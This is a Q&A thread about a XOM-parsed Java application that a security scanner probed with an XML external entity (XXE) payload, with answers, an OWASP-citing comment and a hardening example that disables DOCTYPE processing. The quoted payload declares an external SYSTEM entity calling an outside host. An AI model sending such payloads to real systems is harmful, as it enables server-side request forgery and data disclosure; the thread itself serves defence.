
I have an XML code as below:

  <request><param name=\"client-id\" value=\"organization\"/><param name=\"client-org-id\" value=\"3042d80e24cd4cc31eb9ef48e7012\"/><param name=\"user-agent\" value=\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0\"/><param name=\"client-browser\" value=\"Firefox 48\"/><param name=\"domain-id\" value=\"layout\"/><param name=\"view-id\" value=\"1\"/><param name=\"view-token\" value=\"layout|get-workspace|\"/><param name=\"view-action\" value=\"private.layout:get-workspace\"/><param name=\"view-parent-id\" value=\"\"/><param name=\"view-parent-token\" value=\"\"/><param name=\"view-parent-action\" value=\"\"/></request>

Here I am getting the above XML as a string and I am using the XOM parser to parse the XML. Now my problem is that my application went through a security scan, and the parameter through which I am getting the XML string is injecting an external XML as below:

<?xml version=\"1.0\" encoding=\"utf-8\"?><!DOCTYPE acunetix [><!ENTITY acunetixent SYSTEM \"http://hitrlWBrzWDQ0.bxss.me/\">]><xxx>&acunetixent;</xxx>

So I want to prevent the external entity. What is the best solution for me? Or is there any solution for avoiding the ENTITY tag in XML when parsing the XML using XSD? Thanks in advance.

Debabrata Sahoo

2 Answers


I fear that you cannot do it in XOM.

In http://www.xom.nu/infoset.xhtml, you can read:

All entity references are expanded. XOM does not allow unexpanded entity references.

innovimax

First of all, what you've posted is not XML. You must remove all of the backslash \ characters preceding double quote characters " in order for what you've posted to be well-formed.

So I want to prevent the external entity.

If by this you mean that you want to prevent the external entity from being injected into your XML, then we can't possibly help you because presumably neither we nor you have any control over the security scan that is injecting it.

If by this you mean that you want to prevent the entity reference from being expanded, realize that XML parsers are supposed to expand the entity reference and generally provide no way to override this behavior. @innovimax (+1) has already documented that XOM does not. See here for a hack in XSLT when the entity references are known in advance.

Note finally that in either interpretation of your request, XSD plays no part.

kjhughes
Note that parsing inline DTD leads to security vulnerabilities, like for example XXE or "billion laughs" (see https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing ), and the security best practice is to disable inline DTD processing, as an attacker could add his DTD to any XML processed from user input. – Gabor Lengyel Sep 21 '16 at 12:45
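One way to apply the comment's advice while still using XOM, as an added example that is not code from the question or the answers: XOM's Builder accepts a caller-supplied SAX XMLReader, so the DOCTYPE can be refused at the SAX layer before XOM ever has an entity to expand. It assumes the JDK's built-in Xerces-derived SAX parser, which honours the disallow-doctype-decl feature; the sample strings are constructed from the question's XML (backslashes removed) with a placeholder host in place of the scanner's URL.

```java
import java.io.StringReader;

import javax.xml.parsers.SAXParserFactory;

import nu.xom.Builder;
import nu.xom.Document;
import nu.xom.ParsingException;

import org.xml.sax.XMLReader;

public class HardenedXomParser {

    // Constructed sample: the question's request XML with the backslashes removed (shortened).
    static final String REQUEST_XML =
        "<request><param name=\"client-id\" value=\"organization\"/>"
      + "<param name=\"view-action\" value=\"private.layout:get-workspace\"/></request>";

    // Constructed sample in the shape of the injected payload; the host is a placeholder.
    static final String DOCTYPE_XML =
        "<?xml version=\"1.0\" encoding=\"utf-8\"?>"
      + "<!DOCTYPE acunetix [<!ENTITY acunetixent SYSTEM \"http://xxe.example.invalid/\">]>"
      + "<xxx>&acunetixent;</xxx>";

    /** Builds a XOM Builder whose underlying SAX parser refuses any DOCTYPE declaration. */
    static Builder hardenedBuilder() throws Exception {
        SAXParserFactory spf = SAXParserFactory.newInstance();
        spf.setNamespaceAware(true); // XOM requires a namespace-aware parser
        // Xerces feature (assumed to be honoured by the JDK's built-in parser): reject DOCTYPE
        // outright, so neither internal nor external entities can be declared at all.
        spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Standard SAX features as a second layer for parsers that accept a DOCTYPE.
        spf.setFeature("http://xml.org/sax/features/external-general-entities", false);
        spf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        XMLReader reader = spf.newSAXParser().getXMLReader();
        return new Builder(reader); // XOM's constructor for a caller-supplied SAX parser
    }

    static Document parse(String xml) throws Exception {
        return hardenedBuilder().build(new StringReader(xml));
    }

    public static void main(String[] args) throws Exception {
        Document ok = parse(REQUEST_XML);
        System.out.println("parsed root: " + ok.getRootElement().getQualifiedName());
        try {
            parse(DOCTYPE_XML);
            System.out.println("UNEXPECTED: DOCTYPE was accepted");
        } catch (ParsingException e) {
            // The SAX layer rejects the DOCTYPE before any entity exists to expand;
            // XOM surfaces the underlying SAXParseException as a ParsingException.
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

Because the rejection happens in the SAX parser, the XOM behaviour quoted in the first answer (all entity references are expanded) never comes into play for a document that is refused up front.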